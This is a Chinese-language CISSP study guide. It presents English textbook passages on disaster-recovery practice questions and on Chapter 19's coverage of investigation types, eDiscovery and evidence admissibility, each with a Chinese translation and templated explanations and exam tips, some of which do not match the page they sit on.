Fire suppression system C. Payroll system D. Website 19. What combination of backup strategies provides the fastest backup restoration time? A. Full backups and differential backups B. Partial backups and incremental backups C. Full backups and incremental backups D. Incremental backups and differential backups 20. What type of disaster recovery plan test fully evaluates operations at the backup facility but does not shift primary operations responsibility from the main site? A. Walk-through 16.

中文直译 / 整理

哪种灾难恢复规划工具可用于保护组织免受关键软件公司无法为其产 品提供适当支持的影响? A. 差异备份 B. 业务影响评估 C. 增量备份 D. 软件托管协议 17. 哪种类型的备份始终存储自最近一次完整备份以来所有已修改文件的副本? A. 差异备份 B. 部分备份 C. 增量备份 D. 数据库备份 18. 您经营一家粮食加工业务,正在制定恢复优先级。 以下哪个系统最可能 是您的最高优先级? A. 订单处理系统 B. 火灾抑制系统 C. 工资系统 D. 网站 19. 哪种备份策略组合能提供最快的备份恢复时间? A. 完全备份和差异备份 B. 部分备份和增量备份 C. 完整备份和增量备份 D. 增量备份和差异备份 20. 何种灾难恢复计划测试能够全面评估备用设施的运行情况,但不会将主要 操作责任从主站点转移? A. 走查

小白解释

场景先行:你是公司的安全负责人,正在读第 1278 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1278 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

学习单元 63 / PDF P1279

第 1279 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

B. Parallel test C. Full-interruption test D. Simulation test B.

中文直译 / 整理

并行测试 C. 全中断测试 D. 模拟测试

小白解释

场景先行:你是公司的安全负责人,正在读第 1279 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1279 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

第 19 章 · P1280-1322 · 43 个学习单元

调查与伦理

OSG10 · Chapter 19 · Investigations and Ethics · 全文覆盖 + 小白精读 + 画报

第 19 章:调查与伦理

这不是提炼版。本页按 PDF 第 1280-1322 页连续覆盖第 19 章内容,每个学习单元都包含教材原文段落、PDF 中文直译/整理、小白解释、考点提醒和对应画报。

43个连续学习单元
4格原文 / 直译 / 解释 / 考点
43页覆盖第19章正文与章末练习
小白先讲人话,再做题
学习单元 01 / PDF P1280

本章考试范围总览

先知道本章会覆盖哪些考试目标,后面每个概念才知道放在哪个知识域。

教材原文段落

Chapter 19 Investigations and Ethics THE CISSP TOPICS COVERED IN THIS CHAPTER INCLUDE: Domain 1.0: Security and Risk Management 1.1 Understand, adhere to, and promote professional ethics 1.1.1 ISC2 Code of Professional Ethics 1.1.2 Organizational code of ethics 1.5 Understand requirements for investigation types (e.g., administrative, criminal, civil, regulatory, industry standards) Domain 7.0: Security Operations 7.1 Understand and comply with investigations 7.1.1 Evidence collection and handling 7.1.2 Reporting and documentation 7.1.3 Investigative techniques 7.1.4 Digital forensics tools, tactics, and procedures 7.1.5 Artifacts (e.g., data, computer, network, mobile device) In this chapter, we explore the process of investigating computer security incidents and collecting evidence when appropriate.

This chapter also includes a complete discussion of ethical issues and the code of conduct for information security practitioners. As a security professional, you must be familiar with the various types of investigations. These include administrative, criminal, civil, and regulatory investigations, as well as investigations that involve industry standards. You must be familiar with the standards of evidence used in each investigation type and the forensic procedures used to gather evidence in support of investigations.

中文直译 / 整理

第19章 调查与伦理 本章涵盖的CISSP主题包括: 领域1.0:安全与风险管理 1.1 理解、遵守并推广职业道德 1.1.1 ISC2职业道德准则 1.1.2 组织道德规范 1.5 理解调查类型的要求(例如:行政、刑事、民事、监管、行业标准) 领域 7.0:安全运营 7.1 理解并遵守调查要求 7.1.1 证据收集与处理 7.1.2 报告与文档记录 7.1.3 调查技术 7.1.4 数字取证工具、战术和程序 7.1.5 痕迹(例如,数据、计算机、网络、移动设备) 在本章中,我们探讨了调查计算机安全事件并在适当情况下收集证据的过程。 本章还全面讨论了道德问题以及信息安全从业人员的行为准则。 作为安全专业人员,您必须熟悉各种类型的调查。 这些包括行政调查、刑事 调查、民事调查和监管调查,以及涉及行业标准的调查。 您必须熟悉每种调 查类型所使用的证据标准,以及为支持调查而收集证据的取证程序。

小白解释

场景先行:你是公司的安全负责人,正在读第 1280 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:先知道本章会覆盖哪些考试目标,后面每个概念才知道放在哪个知识域。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

职业伦理:职业伦理要求安全人员保护公众、诚实负责、合法合规。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“本章考试范围总览”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

ISC2 伦理题通常优先保护社会、公共利益和合法性。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
职业伦理 职业伦理要求安全人员保护公众、诚实负责、合法合规。
学习单元 02 / PDF P1281

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Investigations Every information security professional will, at one time or another, encounter a security incident that requires an investigation. In many cases, this investigation will be a brief, informal determination that the matter is not serious enough to warrant further action or the involvement of law enforcement authorities. However, in some cases, the threat posed or damage done will be severe enough to require a more formal inquiry. When this occurs, investigators must be careful to ensure that proper procedures are followed.

Failure to abide by the correct procedures may violate the civil rights of those individual(s) being investigated and could result in a failed prosecution or even legal action against the investigator. Investigation Types Security practitioners may find themselves conducting investigations for a wide variety of reasons. Some of these investigations involve law enforcement and must follow rigorous standards designed to produce evidence that will be admissible in court. Other investigations support internal business processes and require much less rigor.

Administrative Investigations Administrative investigations are internal investigations that examine either operational issues or a violation of the organization's policies. They may be conducted as part of a technical troubleshooting effort or in support of other administrative processes, such as human resources disciplinary procedures. Operational investigations examine issues related to the organization's computing infrastructure and have the primary goal of resolving operational issues. For example, an IT team noticing performance issues on their web servers may conduct an operational investigation designed to determine the cause of the performance problems.

Administrative investigations may quickly transition to another type of investigation. For example, an investigation into a performance issue may uncover evidence of a system intrusion that may then become a criminal investigation.

中文直译 / 整理

调查 每位信息安全专业人员都将在某个时刻遇到需要调查的安全事件。 在许多情况 下,这种调查仅需进行简短、非正式的判断,以确定该事件严重性不足,无需 采取进一步行动或牵涉执法机构。 然而,在某些情况下,所构成的威胁或造成 的损害将足够严重,需要进行更正式的调查。 在这种情况下,调查人员必须谨 慎确保遵循正确的程序。 未能遵守正确程序可能侵犯被调查个人的民事权利, 并可能导致起诉失败,甚至对调查人员提起法律诉讼。 调查类型 安全从业人员可能会因各种原因开展调查。 其中一些调查涉及执法,必须遵 循严格的标准,以生成可在法庭上被采纳的证据。 其他调查则支持内部业务 流程,对严谨性的要求较低。 行政调查 行政调查是内部调查,用于审查运营问题或违反组织政策的行为。 它们可能作 为技术故障排除的一部分进行,或用于支持其他行政流程,例如人力资源纪律 程序。 运营调查旨在审查与组织计算基础设施相关的问题,主要目标是解决运营问题。 例如,IT团队若发现其Web服务器性能异常,可能会开展一项运营调查,以 确定性能问题的原因。 行政调查可能迅速转变为其他类型的调查。 例如,对性能问题的调查 可能发现系统入侵的证据,从而可能演变为刑事调查。

小白解释

场景先行:你是公司的安全负责人,正在读第 1281 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
学习单元 03 / PDF P1282

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Operational investigations have the loosest standards for collection of information. They are not intended to produce evidence because they are for internal operational purposes only. Therefore, administrators conducting an operational investigation will only conduct analysis necessary to reach their operational conclusions. The collection need not be thorough or well documented, because resolving the issue is the primary goal. In addition to resolving the operational issue, operational investigations often conduct a root cause analysis that seeks to identify the reason that an operational issue occurred.

The root cause analysis often highlights issues that require remediation to prevent similar incidents in the future. Administrative investigations that are not operational in nature may require a stronger standard of evidence, especially if they may result in sanctions against an individual. There is no set guideline for the appropriate standard of evidence in these investigations. Security professionals should consult with the sponsor of the investigation as well as their legal team to determine appropriate evidence collection, handling, and retention guidelines for administrative investigations.

Criminal Investigations Criminal investigations, typically conducted by law enforcement personnel, investigate the alleged violation of criminal law. Criminal investigations may result in charging suspects with a crime and the prosecution of those charges in criminal court. Most criminal cases must meet the beyond a reasonable doubt standard of evidence. Following this standard, the prosecution must demonstrate that the defendant committed the crime by presenting facts from which there are no other logical conclusions. For this reason, criminal investigations must follow strict evidence collection and preservation processes.

Civil Investigations Civil investigations typically do not involve law enforcement but rather involve internal employees and outside consultants working on behalf of a legal team. They prepare the evidence necessary to present a case in civil court resolving a dispute between two parties. Most civil cases do not follow the beyond a reasonable doubt standard of proof. Instead, they use the weaker preponderance of the evidence standard. Meeting this standard simply requires that the evidence demonstrate that the

中文直译 / 整理

运营调查在信息收集方面的标准最为宽松。 它们并非旨在生成证据,而仅用于 内部运营目的。 因此,进行运营调查的管理员只需进行必要的分析以得出其运 营结论。 收集过程无需详尽或妥善记录,因为解决问题才是首要目标。 除了解决运营问题外,运营调查通常会进行根本原因分析,以查明运营问题发 生的原因。 根本原因分析通常会突出需要纠正的问题,以防止未来发生类似事 件。 非运营性质的行政调查可能需要更高的证据标准,特别是当它们可能导致对个 人的制裁时。 对于此类调查,没有设定的适当证据标准指南。 安全专业人员应 与调查发起方及其法律团队协商,以确定行政调查中适当的证据收集、处理和 保存指南。 刑事调查 刑事调查通常由执法人员进行,调查涉嫌违反刑法的行为。 刑事调查可能导致 对嫌疑人提起刑事指控,并在刑事法庭上对这些指控进行起诉。 大多数刑事案件必须满足排除合理怀疑的证据标准。 根据这一标准,检方必须 通过呈现无可其他合理结论的事实,证明被告实施了犯罪。 因此,刑事调查必 须遵循严格的证据收集和保存程序。 民事调查 民事调查通常不涉及执法部门,而是由内部员工和代表法律团队的外部顾问 开展。

他们准备必要的证据,以便在民事法庭上呈现案件,解决双方之间的 争议。 大多数民事案件不遵循"排除合理怀疑"的证明标准。 相反,它们使用较弱的证 据优势标准。 满足这一标准只需证明证据表明

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

标准:标准给出必须满足的最低要求。

指南:指南是建议做法,不一定强制。

程序:程序是一步一步怎么做。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Minimum level、mandatory requirement 常对应 standard。

Recommended、not compulsory 常对应 guideline。

Step-by-step、SOP 常对应 procedure。

保留太短会影响合规和取证,保留太久会增加泄露风险和成本。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
标准 标准给出必须满足的最低要求。
指南 指南是建议做法,不一定强制。
程序 程序是一步一步怎么做。
保留期限 保留期限规定数据、日志或记录要保存多久。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 04 / PDF P1283

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

outcome of the case is more likely than not. For this reason, evidence collection standards for civil investigations are not as rigorous as those used in criminal investigations. Regulatory Investigations Government agencies may conduct regulatory investigations when they believe that an individual or corporation has violated administrative law. Regulators typically conduct these investigations with a standard of proof commensurate with the venue where they expect to try their case. Regulatory investigations vary widely in scope and procedure and are often conducted by government agents. Industry Standards Some regulatory investigations may not involve government agencies.

These are based on industry standards, such as the Payment Card Industry Data Security Standard (PCI DSS). These industry standards are not laws but are contractual obligations entered into by the participating organizations. In some cases, including PCI DSS, the organization may be required to submit to audits, assessments, and investigations conducted by an independent third party. Failure to participate in these investigations or negative investigation results may lead to fines or other sanctions. Therefore, investigations into violations of industry standards should be treated in a similar manner as regulatory investigations.

Electronic Discovery In legal proceedings, each side has a duty to preserve evidence related to the case and, through the discovery process, share information with their adversary in the proceedings. This discovery process applies to both paper records and electronic records, and the electronic discovery (or eDiscovery) process facilitates the processing of electronic information for disclosure.

The Electronic Discovery Reference Model (EDRM) describes a standard process for conducting eDiscovery with nine aspects: Information Governance Ensures that information is well organized for future eDiscovery efforts Identification Locates the information that may be responsive to a discovery request when the organization believes that litigation is likely

中文直译 / 整理

案件的结果更有可能成立。 因此,民事调查的证据收集标准不如刑事调查那样 严格。 监管调查 当政府机构认为个人或公司违反了行政法时,可能会进行监管调查。 监管机构 通常会根据其预期提起诉讼的场所,采用相应的证明标准进行此类调查。 监管 调查的范围和程序差异很大,通常由政府官员执行。 行业标准 一些监管调查可能不涉及政府机构,而是基于行业标准,例如支付卡行业数据 安全标准(PCI DSS)。 这些行业标准并非法律,而是参与组织所签订的合同 义务。 在某些情况下,包括PCI DSS在内,组织可能被要求接受由独立第三方 进行的审计、评估和调查。 未能参与这些调查或调查结果不佳,可能导致罚款 或其他制裁。 因此,对违反行业标准行为的调查应视为与监管调查类似。 电子取证 在法律程序中,各方均有义务保存与案件相关的证据,并通过取证程序与对 方共享信息。 此取证程序适用于纸质记录和电子记录,而电子取证(或 eDiscovery)过程则有助于处理电子信息以供披露。

电子取证参考模型(EDRM)描述了进行电子取证的标准流程,包含九个方面: 信息治理 确保信息为未来的电子取证工作做好充分组织 识别 当组织认为诉讼可能发生时,定位可能对发现请求有响应的信息

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

NIST:NIST 提供美国常用安全标准、框架和指南。

PCI DSS:PCI DSS 是支付卡行业数据安全标准。

标准:标准给出必须满足的最低要求。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

信用卡/持卡人数据场景优先想到 PCI DSS。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
NIST NIST 提供美国常用安全标准、框架和指南。
PCI DSS PCI DSS 是支付卡行业数据安全标准。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
审计 审计检查控制是否存在、是否有效、是否符合要求。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 05 / PDF P1284

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

Preservation Ensures that potentially discoverable information is protected against alteration or deletion Collection Gathers the relevant information centrally for use in the eDiscovery process Processing Screens the collected information to perform a “rough cut” of irrelevant information, reducing the amount of information requiring detailed screening Review Examines the remaining information to determine what information is relevant to the request and removes any information protected by attorney-client privilege Analysis Performs deeper inspection of the content and context of remaining information Production Places the information into a format that may be shared with others and delivers it to other parties, such as opposing counsel Presentation Displays the information to witnesses, the court, and other parties For more information on the EDRM, see http://edrm.net/resources/frameworks-and-standards/edrm-model.

Conducting eDiscovery is a complex process and requires careful coordination between IT professionals and legal counsel. Evidence To successfully prosecute a crime, the prosecuting attorneys must provide sufficient evidence to prove an individual's guilt beyond a reasonable doubt. In the following sections, we'll explain the requirements that evidence must meet before it is allowed in court, the various types of evidence that may be introduced, and the requirements for handling and documenting evidence.

The items of evidence that you maintain and may use in court are also known as artifacts and may include physical devices, such as computers, mobile devices, and network devices, the logs and data generated by those devices, and many other forms of evidence.

中文直译 / 整理

保存 确保潜在可发现的信息免受篡改或删除 收集 集中收集相关信息,用于电子取证过程 处理 筛选已收集的信息,进行初步剔除无关内容,减少需要详细审查的信息量 审查 审查剩余信息,确定哪些信息与请求相关,并移除受律师‑客户特权保护的 信息 分析 对剩余信息的内容和上下文进行更深入的检查 提供 将信息整理为可与其他方共享的格式,并交付给其他方,例如对方律师 展示 向证人、法庭和其他方展示信息 For more information on the EDRM, see http://edrm.net/resources/frameworks-and-standards/edrm-model. 电子证据开示是一个复杂的过程,需要IT专业人员和法律顾问之间的 仔细协调。 证据 要成功起诉犯罪,检察官必须提供充分的证据,以证明个人的罪行超出合理怀 疑。 在以下章节中,我们将解释证据在被允许进入法庭前必须满足的要求、可 以提交的各种证据类型,以及处理和记录证据的要求。 您保管并可能在法庭上 使用的证据物品也称为物证,可能包括物理设备,如计算机、移动设备和网络 设备,这些设备生成的日志和数据,以及其他多种形式的证据。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

网络题先定位层次,再判断协议、设备或攻击位置。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
标准 标准给出必须满足的最低要求。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 06 / PDF P1285

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

The National Institute of Standards and Technology's Guide to Integrating Forensic Techniques into Incident Response (SP 800-86) is a great reference and is available at https://csrc.nist.gov/pubs/sp/800/86/final. Admissible Evidence There are three basic requirements for evidence to be introduced into a court of law. To be considered admissible evidence, it must meet all three of these requirements, as determined by a judge, prior to being discussed in open court: The evidence must be relevant to determining a fact. The fact that the evidence seeks to determine must be material (that is, related) to the case. The evidence must be competent, meaning it must have been obtained legally.

Evidence that results from an illegal search would be inadmissible because it is not competent. Types of Evidence Many different types of evidence can be used in a court of law. Depending on the reference you consult, these may be grouped in many different ways. However, you should be familiar with these four major categories: real evidence, documentary evidence, testimonial evidence, and demonstrative evidence. Each has slightly different additional requirements for admissibility. Real Evidence Real evidence (also known as object evidence) consists of things that may actually be brought into a court of law.

In common criminal proceedings, this may include items such as a murder weapon, clothing, or other physical objects. In a computer crime case, real evidence might include seized computer equipment, such as a keyboard with fingerprints on it or a hard drive from a malicious actor's computer system. Depending on the circumstances, real evidence may also be conclusive evidence, such as DNA, that is incontrovertible.

中文直译 / 整理

美国国家标准与技术研究院的《将法医技术整合到事件响应中的指南》 (SP 800‑86)是一个优秀的参考文献,可在以下网址获取: https://csrc.nist.gov/pubs/sp/800/86/final. 可采信的证据 证据要被引入法庭,必须满足三个基本要求。 要被视为可采信的证据,必须在 公开庭审讨论之前,由法官判定其满足全部三项要求: 该证据必须与确定某一事实相关。 该证据所要确定的事实必须与案件相关(即具有关联性)。 该证据必须是com petent , meanin g 它必须是通过合法途径获得的 合法。 通过非法搜查获得的证据将被排除,因为它不具备证据能力。 证据的类型 在法庭上可以使用多种不同类型的证据。 根据您参考的资料,这些证据可能以 多种方式分类。 然而,您应熟悉以下四大类别:实物证据、文件证据、证人证 言和示证证据。 每类证据对可采性都有略微不同的附加要求。 真实证据 真实证据(也称为物证)是指可以实际呈交法庭的物品。 在常见的刑 事案件中,这可能包括凶器、衣物或其他实物。 在计算机犯罪案件中,真实证 据可能包括被扣押的计算机设备,例如带有指纹的键盘或恶意行为者计算机系 统中的硬盘。

根据具体情况,真实证据也可能是确凿证据,例如无可辩驳的 DNA。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

标准:标准给出必须满足的最低要求。

指南:指南是建议做法,不一定强制。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Minimum level、mandatory requirement 常对应 standard。

Recommended、not compulsory 常对应 guideline。

日志要保护完整性、时间同步和访问控制。

准备、检测、遏制、根除、恢复、经验教训是常见顺序。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
标准 标准给出必须满足的最低要求。
指南 指南是建议做法,不一定强制。
日志 日志记录系统和用户活动,用于监控、审计和调查。
事件响应 事件响应是发现、遏制、根除、恢复并复盘安全事件的过程。
学习单元 07 / PDF P1286

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Documentary Evidence Documentary evidence includes any written items brought into court to prove a fact at hand. This type of evidence must also be authenticated. For example, if an attorney wants to introduce a computer log as evidence, they must bring a witness (for example, the system administrator) into court to testify that the log was collected as a routine business practice and is indeed the actual log that the system collected. Two additional evidence rules apply specifically to documentary evidence: The best evidence rule states that when a document is used as evidence in a court proceeding, the original document must be introduced.

Copies or descriptions of original evidence (known as secondary evidence) will not be accepted as evidence unless certain exceptions to the rule apply. The parol evidence rule states that when an agreement between parties is put into written form, the written document is assumed to contain all the terms of the agreement and no verbal agreements may modify the written agreement. If documentary evidence meets the materiality, competency, and relevancy requirements and also complies with the best evidence and parol evidence rules, it can be admitted into court.

中文直译 / 整理

文件证据 文件证据包括任何提交法庭以证明相关事实的书面材料。 此类证据也必 须经过认证。 例如,如果律师希望将计算机日志作为证据引入,他们必须传唤一 名证人(例如系统管理员)出庭作证,证明该日志是作为常规业务实践收集的, 并且确实是系统所收集的实际日志。 另有两项证据规则专门适用于书面证据: 最佳证据规则规定,当文件作为法庭程序中的证据使用时,必须提交原件。 原件的副本或描述(称为次要证据)不得作为证据接受,除非适用该规则 的某些例外情况。 口头证据规则规定,当双方协议以书面形式确定时,该书面文件被视为包 含协议的全部条款,任何口头协议均不得修改书面协议。 如果书面证据符合重要性、适格性和相关性要求,并且也遵守最佳证据规则 和口头证据规则,则可被法院采纳。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

